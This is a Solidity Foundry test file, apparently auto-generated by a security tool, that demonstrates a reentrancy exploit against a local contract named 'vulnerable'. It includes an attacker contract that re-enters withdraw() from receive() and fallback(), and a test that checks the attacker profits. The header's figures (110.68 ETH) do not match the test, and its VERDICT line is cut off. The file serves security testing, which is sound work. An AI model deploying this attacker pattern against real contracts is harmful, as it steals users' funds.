// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "forge-std/Test.sol";
import "forge-std/console.sol";

/**
 * ╔═══════════════════════════════════════════════════════════════════╗
 * ║  AGL DYNAMIC PoC #4 — Auto-Generated Exploit Test           ║
 * ╚═══════════════════════════════════════════════════════════════════╝
 *
 * CONTRACT:      vulnerable
 * FUNCTION:      withdraw
 * VULNERABILITY: REENTRANCY
 * SEVERITY:      critical
 * CONFIDENCE:    100.0%
 * VERDICT:       EXPLOITABLE: withdraw() — Z3 SAT with concrete values, invariant 'balance_conservation' violated. At
 *
 * ATTACK STEPS:
 *   1. 1. Attacker deploys malicious contract with receive()/fallback()
 *   2. 2. Attacker deposits 110.68 ETH → withdraw() records balance
 *   3. 3. Attacker calls withdraw()
 *   4. 4. Contract sends 110.68 ETH via .call{value} BEFORE updating state
 *   5. 5. Attacker's receive() re-enters withdraw()
 *   6. 6. require(balances[attacker] >= amount) PASSES — balance not yet decremented
 *   7. 7. Contract sends 110.68 ETH AGAIN
 *   8. 8. State finally updates — but attacker already received 2x
 *
 * GENERATED BY:  AGL Security Tool — Dynamic PoC Generator
 * DATE:          2026-03-27 03:45
 */

import "../../vulnerable.sol";

/// @notice Attacker contract that exploits reentrancy in vulnerable.withdraw
contract ReentrancyAttacker {
    vulnerable public target;
    uint256 public attackCount;
    uint256 public attackAmount;

    constructor(address _target) {
        target = vulnerable(payable(_target));
    }

    function attack() external payable {
        attackAmount = msg.value;
        // Step 1: Deposit to become a valid user
        // No payable deposit found -- manual setup may be needed
        // Step 2: Trigger the vulnerable function
        target.withdraw();
    }

    // Step 3: Re-enter on ETH receive
    receive() external payable {
        if (attackCount < 3 && address(target).balance >= attackAmount) {
            attackCount++;
            target.withdraw();
        }
    }

    fallback() external payable {
        if (attackCount < 3 && address(target).balance >= attackAmount) {
            attackCount++;
            target.withdraw();
        }
    }
}

contract PoC_Reentrancy_vulnerable_Test is Test {
    vulnerable public vulnerable;
    ReentrancyAttacker public attacker;

    function setUp() public {
        // Deploy the REAL vulnerable contract
        vulnerable = new vulnerable();
        attacker = new ReentrancyAttacker(address(vulnerable));

        // Fund the contract with victim deposits
        address victim = makeAddr("victim");
        vm.deal(victim, 10 ether);
        vm.prank(victim);
        vulnerable.deposit{value: 10 ether}();
    }

    function test_reentrancy_exploit() public {
        console.log("=== AGL PoC: Reentrancy in vulnerable.withdraw ===");

        uint256 contractBefore = address(vulnerable).balance;
        console.log("Contract balance before:", contractBefore / 1e18, "ETH");

        // Execute reentrancy attack with 1 ETH
        vm.deal(address(attacker), 1 ether);
        attacker.attack{value: 1 ether}();

        uint256 contractAfter = address(vulnerable).balance;
        uint256 attackerBalance = address(attacker).balance;
        console.log("Contract balance after:", contractAfter / 1e18, "ETH");
        console.log("Attacker profit:", attackerBalance / 1e18, "ETH");

        // The attacker should have more than their initial 1 ETH
        assertGt(attackerBalance, 1 ether, "Reentrancy exploit: attacker should profit");
        console.log("[CONFIRMED] Reentrancy vulnerability exploited!");
    }
}
